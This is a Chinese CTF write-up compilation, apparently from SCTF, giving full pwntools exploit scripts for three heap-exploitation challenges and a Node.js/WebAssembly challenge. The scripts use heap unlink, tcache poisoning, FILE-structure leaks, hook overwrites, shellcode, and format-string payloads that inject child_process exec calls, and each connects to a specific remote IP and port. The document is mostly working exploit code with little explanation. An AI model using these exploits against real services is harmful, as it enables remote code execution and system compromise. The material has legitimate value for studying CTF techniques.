汇总

easy heap

from pwn import *
context(arch = 'amd64',os='linux')
def add(size):
    p.recvuntil('>>')
    p.sendline('1')
    p.recvuntil('Size')
    p.sendline(str(size))
    p.recvuntil('0x')
    return p.recv(12)

def dele(idx):
    p.recvuntil('>>')
    p.sendline('2')
    p.recvuntil('Index')
    p.sendline(str(idx))

def edit(idx,cont):
    p.recvuntil('>>')
    p.sendline('3')
    p.recvuntil('Index')
    p.sendline(str(idx))
    p.recvuntil('Content')
    p.send(cont)
libc = ELF('./libc.so.6')
#p = process('./easy_heap',env={'LD_PRELOAD':'./libc-2.23.so'})
p = remote('132.232.100.67', 10004)
p.recvuntil('0x')
mmap_addr = int(p.recvuntil('\n')[:-1],16)
print hex(mmap_addr)
ptr_addr = int(add(0x100-8),16)#0
info("ptr:0x%x",ptr_addr)
add(0xf8)#1
add(0xf8)#2
edit(0,p64(0)+p64(0xf1)+p64(ptr_addr-0x18)+p64(ptr_addr-0x10)+(0x100-8-16-8-16)*'\x00'+p64(0xf0))
dele(1)
#edit(0,p64(0)+p64(0)+p64(0x200)+p64(ptr_addr-8)+p64(0x90)+p64(ptr_addr+0x30-8)+p64(0)+p64(0x91)+'\x00'*0x80+p64(0x90)+p64(0x91)+'\n')

add(0x80)#1
add(0x80)#3
add(0x80)#4
dele(1)
dele(4)
edit(0,p64(0)+p64(0)+p64(0x200)+p64(ptr_addr-8+0x50)+p64(0x200)+p64(mmap_addr)+p64(0)*2+p64(0x80)+'\x28\n')
edit(3,p64(ptr_addr+0x40)+'\n')
add(128)
a = 0x16# int(raw_input("a"),16)
edit(0,p64(0x200)+'\x20'+chr(a)+'\n')
edit(5,p64(0xfbad3c80)+p64(0)*3+p8(0)+'\n')
p.recvuntil(p64(0)*3)
addr = u64(p.recv(8))
libc_base = addr - (0x7f7af9dfa6e0-0x7f7af9a37000)
print hex(libc_base)
free_hook = libc_base+libc.symbols['__free_hook']
sh = asm(shellcraft.sh())
edit(1,sh+'\n')
edit(0,p64(0x200)+p64(free_hook)+'\n')
edit(5,p64(mmap_addr)+'\n')
p.sendline('2')
p.sendline('0')
p.interactive()

one heap

用hbase爆破pbase的1/8192变态house of Roman + 1/1的house of three

from pwn import *
context.arch = "amd64"
context.aslr = False
libc = ELF("./libc-2.27.so")

def add(size,data,shift = False):
    io.sendlineafter("choice:",str(1))
    io.sendlineafter("size",str(size))
    if(shift == False):
        io.sendlineafter("content:",data)
    else:
        io.sendafter("content:",data)
def rm():
    io.sendlineafter("choice:",str(2))
while(True):
    try:
        #io = process("./one_heap",env = {"LD_PRELOAD":"./libc-2.27.so"})
        io = remote('47.104.89.129',10001)
        add(0x60,'0000')
        rm()
        rm()
        add(0x60,'\x20\x60\x64')
        add(0x60,' ')
        add(0x60,'\n',shift = True)
        add(0x60,p64(0xfbad1880)+p64(0)*3+"\x58")
        lbase = u64(io.recv(6).ljust(8,'\x00'))-libc.sym['_IO_file_jumps']
        success("LBASE -> %#x"%lbase)
        add(0x40,'0000')
        rm()
        rm()
        add(0x40,p64(lbase+libc.sym['__realloc_hook']))
        add(0x40,p64(lbase+libc.sym['__realloc_hook']))
        one = 0x4f2c5
        add(0x40,p64(lbase+one)+p64(lbase+libc.sym['realloc']+0xe))
        add(0x30,"cat flag\x00")
        #gdb.attach(io,'handle SIGALRM nostop noprint')
        io.interactive()
        raw_input()
    except Exception,e:
        info(str(Exception)+str(e))
        io.close()

two heap

0x1 0x8 0x10 0x18绕size check(都是生成0x20的堆块)

from pwn import *
context.arch = 'amd64'
#context.aslr = False
libc = ELF("./libc-2.26.so")

def add(size,data):
    io.sendlineafter("choice:","1")
    io.sendlineafter("size:\n",str(size))
    io.sendafter("note:\n",data)
def rm(idx):
    io.sendlineafter("choice:","2")
    io.sendlineafter("index:\n",str(idx))
while(True):
    try:
        io = remote('47.104.89.129',10002)
        #io = process("./two_heap",env = {"LD_PRELOAD":"./libc-2.26.so"})
        io.sendlineafter("SCTF:\n","%a%a%a%a%a")
        io.recvuntil("0x0.0")
        lbase = (int(io.recv(11),16)<<4)-libc.sym['_IO_2_1_stdout_']
        info("LBASE -> %#x"%lbase)
        add(1,'')
        rm(0);rm(0);ls
        add(8,p64(lbase+libc.sym['__free_hook']))
        add(0x10,'\n')
        add(24,p64(lbase+libc.sym['system'])+'\n')
        add(40,"/bin/sh\x00"+"\n")
        io.sendline("2")
        io.sendline("4")
        #gdb.attach(io,'handle SIGALRM nostop noprint')
        io.interactive()
        raw_input()
    except Exception,e:
        info(str(e))
        io.close()

easywasm

出题人:0xd5f 解题人数:0 最终分数:1000

程序存在一个结构体用于保存信息记录

C struct { char *username; int password; char *introduction; void (*state)(const char *); } record;

先说三个函数逻辑

registered()用于初始化record结构体

profile()用于打印username和introduction

login()用于验证username和password并通过state函数指针返回登录成功或失败的状态信息

因为程序存在Z_envZ__emen_run_Z_vi,只需要改变state即可,但是如果成功调用,还需要泄露出password
其中profile()存在一个溢出漏洞和一个格式化字符串漏洞,通过溢出,我们可以控制任意写的地址,然后再leak出password即可,许多payload的细节可以调试知道
不过带师傅们好像更热衷于ddos,Orz
exp

import requests

url = 'http://47.104.89.129:23333/'

registered = url + 'registered' profile = url + 'profile' login = url + 'login'

username = 'username' password = 'password' introduction = 'introduction'

payload = '' payload += 'A'*7 payload += ''' const exec=require("child_process").exec; exec("cat flag", function(error,stdout,stderr){process.stdout.write(stdout);}); '''.ljust(0x7f, ' ') payload += '//\x3C\x0D\x00'

params = { username: '%2$0141d%1$n', introduction: payload } requests.get(registered, params=params) req = requests.get(profile) passwd = req.text.lstrip('Welcome, ').rstrip('Your introduction: AAAAAAA')

params = { username: '%2$0141d%1$n', password: passwd } requests.get(login, params=params)

本文章首发在 网安wangan.com 网站上。

上一篇 下一篇
讨论数量: 0
只看当前版本


暂无话题~